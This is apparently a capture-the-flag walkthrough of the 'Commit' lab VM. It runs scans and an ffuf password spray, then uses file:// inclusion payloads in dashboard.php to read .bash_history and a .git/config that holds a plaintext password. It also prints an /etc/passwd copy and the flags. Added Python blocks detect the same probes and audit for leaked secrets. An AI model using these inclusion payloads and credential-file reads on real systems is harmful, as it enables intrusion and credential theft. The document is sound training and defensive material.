3. [Test] commit

1. Information Gathering

1.1. Port Scan

┌──(root㉿kali)-[~]
└─# nmap -sCV 192.168.56.107 -p-               
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 22:54 EDT
Nmap scan report for 192.168.56.107
Host is up (0.0021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: DevSecOps Platform v3.0
|_http-server-header: Apache/2.4.62 (Debian)
2222/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
MAC Address: 08:00:27:1E:C7:45 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds

1.2. Directory Scan

┌──(root㉿kali)-[~/Desktop/hmv/commit]
└─# dirsearch -u 192.168.56.107 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/hmv/commit/reports/_192.168.56.107/_25-05-17_23-06-35.txt

Target: http://192.168.56.107/

[23:06:35] Starting: 
[23:06:36] 403 -  279B  - /.ht_wsr.txt
[23:06:36] 403 -  279B  - /.htaccess.bak1
[23:06:36] 403 -  279B  - /.htaccess.orig
[23:06:36] 403 -  279B  - /.htaccess.sample
[23:06:36] 403 -  279B  - /.htaccess.save
[23:06:36] 403 -  279B  - /.htaccess_orig
[23:06:36] 403 -  279B  - /.htaccess_extra
[23:06:36] 403 -  279B  - /.htaccessOLD
[23:06:36] 403 -  279B  - /.htaccessOLD2
[23:06:36] 403 -  279B  - /.htaccessBAK
[23:06:36] 403 -  279B  - /.htaccess_sc
[23:06:36] 403 -  279B  - /.htm
[23:06:36] 403 -  279B  - /.html
[23:06:36] 403 -  279B  - /.htpasswd_test
[23:06:36] 403 -  279B  - /.htpasswds
[23:06:36] 403 -  279B  - /.php
[23:06:37] 403 -  279B  - /.httr-oauth
[23:06:44] 302 -    0B  - /dashboard.php  ->  login.php
[23:06:48] 200 -  655B  - /login.php
[23:06:54] 403 -  279B  - /server-status
[23:06:54] 403 -  279B  - /server-status/
[23:06:57] 301 -  318B  - /uploads  ->  http://192.168.56.107/uploads/
[23:06:57] 200 -  407B  - /uploads/

┌──(root㉿kali)-[~/Desktop/hmv/commit]
└─# ffuf -u http://192.168.56.107/login.php -X POST -d 'username=admin&password=FUZZ' -w /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt |grep -v 'Size: 1726'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://192.168.56.107/login.php
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt
 :: Data             : username=admin&password=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

:: Progress: [10000/10000] :: Job [1/1] :: 6451 req/sec :: Duration: [0:00:01] :: Errors: 0 ::

Pressing F12 (browser developer tools) reveals a test account in the page source.
[screenshot omitted: Pasted image 20250518125122]

1.3. LFI

[screenshot omitted: Pasted image 20250518130759]

file=file:///home/lingmj/.bash_history

[screenshot omitted: Pasted image 20250518132808]
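From the defender's side, the two web-facing steps above (the ffuf password spray against /login.php and the file= parameter accepting a file:// URL on dashboard.php) both leave clear traces in the Apache access log. The following is an added example, not part of the original writeup, that parses Apache Common Log Format lines and flags both patterns; the log lines are constructed here to imitate the requests in the writeup, and the threshold and window values are assumptions.

```python
"""
Detection logic for the two web-side activities shown above: a password
brute-force burst against /login.php and file= query parameters carrying
file:// or path-traversal payloads. Log lines are constructed for this example
in Apache Common Log Format and only imitate the writeup's requests.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlparse

# Apache Common Log Format: ip ident user [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Substrings in a decoded query value that indicate file inclusion or wrapper abuse.
LFI_MARKERS = ("file://", "php://", "../", "/etc/passwd", ".bash_history", "/.git/")


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, path="/login.php", window_s=60, threshold=20):
    """Map IP -> peak number of POSTs to `path` inside any window_s-second window,
    reporting only IPs whose peak reaches `threshold` (assumed values)."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and urlparse(rec["path"]).path == path:
            posts[rec["ip"]].append(rec["ts"])
    offenders = {}
    for ip, times in posts.items():
        times.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(times):          # sliding window over sorted timestamps
            while (t - times[lo]).total_seconds() > window_s:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            offenders[ip] = peak
    return offenders


def find_lfi_probes(lines):
    """Return (ip, script, decoded_value) for every query value containing an LFI marker."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        url = urlparse(rec["path"])
        for values in parse_qs(url.query).values():
            for v in values:
                decoded = unquote(v)          # parse_qs decoded once; catch double-encoding too
                if any(marker in decoded for marker in LFI_MARKERS):
                    hits.append((rec["ip"], url.path, decoded))
    return hits


def build_sample_log():
    """Constructed sample: 25 POSTs to /login.php within two seconds from one IP,
    a normal browsing session from another, and two file= probes."""
    fmt = '{ip} - - [18/May/2025:13:{mm:02d}:{ss:02d} +0000] "{m} {p} HTTP/1.1" {s} {b}'
    lines = [fmt.format(ip="192.168.56.1", mm=6, ss=35 + i // 13,
                        m="POST", p="/login.php", s=302, b=0) for i in range(25)]
    lines += [
        fmt.format(ip="192.168.56.20", mm=7, ss=1, m="GET", p="/login.php", s=200, b=655),
        fmt.format(ip="192.168.56.20", mm=7, ss=9, m="POST", p="/login.php", s=302, b=0),
        fmt.format(ip="192.168.56.1", mm=28, ss=8, m="GET",
                   p="/dashboard.php?file=file:///home/lingmj/.bash_history", s=200, b=1033),
        fmt.format(ip="192.168.56.1", mm=28, ss=40, m="GET",
                   p="/dashboard.php?file=..%2F..%2F..%2Fetc%2Fpasswd", s=200, b=2100),
    ]
    return lines


if __name__ == "__main__":
    log = build_sample_log()
    print("brute-force offenders:", find_bruteforce(log))
    for ip, script, value in find_lfi_probes(log):
        print(f"LFI probe from {ip} on {script}: {value}")
```

The brute-force check counts only POSTs to the login script, so a user reloading the form is not flagged; the LFI check decodes query values before matching, which is why the percent-encoded traversal in the sample is still caught. Feeding a real /var/log/apache2/access.log through the same functions line by line works unchanged as long as the file uses the Common Log Format prefix.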

/dashboard.php?file=file:///home/lingmj/.git/config

[screenshot omitted: Pasted image 20250518132901]

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	#lingmj:10839254acf247b9e456d713d673f9ee

10839254acf247b9e456d713d673f9ee is the password itself, not an MD5 hash.

lingmj@Commit:~$ cat user.txt 
flag{user-3d442179fc3b320d70689ebb7cb764af}

1.4. welcome

welcome@Commit:/home$ cat /etc/passwd-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:3d442179fc3b320d70689ebb7cb764af:/home/welcome:/bin/bash
lingmj:x:1001:1001::/home/lingmj:/bin/bash

welcome:3d442179fc3b320d70689ebb7cb764a
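Both credentials on this box were recovered from metadata that should never hold secrets: a comment line in .git/config (section 1.3) and the GECOS field of a /etc/passwd entry (this section). The following is an added audit example, not code from the writeup, that scans both locations for 32-hex-character tokens; the sample inputs are constructed here from the outputs shown above, and the token format is an assumption that matches those findings rather than a general secret-detection rule.

```python
"""
Audit checks for the two places this box leaked credentials: a comment inside a
.git/config and the GECOS (comment) field of /etc/passwd. Sample inputs are
constructed for this example and mirror the writeup's findings; the scanner is
generic and reports any 32-hex-character token in those locations.
"""
import re

HEX32 = re.compile(r"\b[0-9a-f]{32}\b")
# "user:token" as seen in the leaked git config comment
USER_TOKEN = re.compile(r"(?P<user>[a-z_][a-z0-9_-]*):(?P<token>[0-9a-f]{32})\b")


def scan_config_comments(text):
    """Return (line_no, user, token) for user:token pairs found in '#' or ';' comments."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line.startswith(("#", ";")):
            continue               # only comments: git ignores them, people do not
        m = USER_TOKEN.search(line)
        if m:
            findings.append((n, m.group("user"), m.group("token")))
    return findings


def scan_passwd_gecos(text):
    """Return (user, gecos) for passwd entries whose GECOS field contains a 32-hex token."""
    findings = []
    for raw in text.splitlines():
        fields = raw.split(":")
        if len(fields) != 7:
            continue               # not a well-formed passwd entry
        user, gecos = fields[0], fields[4]
        if HEX32.search(gecos):
            findings.append((user, gecos))
    return findings


# Constructed sample inputs (modelled on the outputs shown in the writeup).
SAMPLE_GIT_CONFIG = "\n".join([
    "[core]",
    "\trepositoryformatversion = 0",
    "\tfilemode = true",
    "\tbare = false",
    "\tlogallrefupdates = true",
    "\t#lingmj:10839254acf247b9e456d713d673f9ee",
])

SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin",
    "welcome:x:1000:1000:3d442179fc3b320d70689ebb7cb764af:/home/welcome:/bin/bash",
    "lingmj:x:1001:1001::/home/lingmj:/bin/bash",
])


if __name__ == "__main__":
    for n, user, token in scan_config_comments(SAMPLE_GIT_CONFIG):
        print(f".git/config line {n}: credential comment for {user} ({token[:6]}...)")
    for user, gecos in scan_passwd_gecos(SAMPLE_PASSWD):
        print(f"/etc/passwd: GECOS of {user} looks like a secret: {gecos}")
```

Running the same two functions over a real repository's .git/config and the host's /etc/passwd (and /etc/passwd-, the backup copy read above, which is world-readable and often forgotten) is a cheap periodic check; GECOS is also exposed through finger, getent and the LFI already present on this box, so a secret placed there is effectively public.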

1.5. root

sshd_config
[screenshot omitted: Pasted image 20250518145850]
flag{root-0249c05215c01f5cb86b0832932e170f}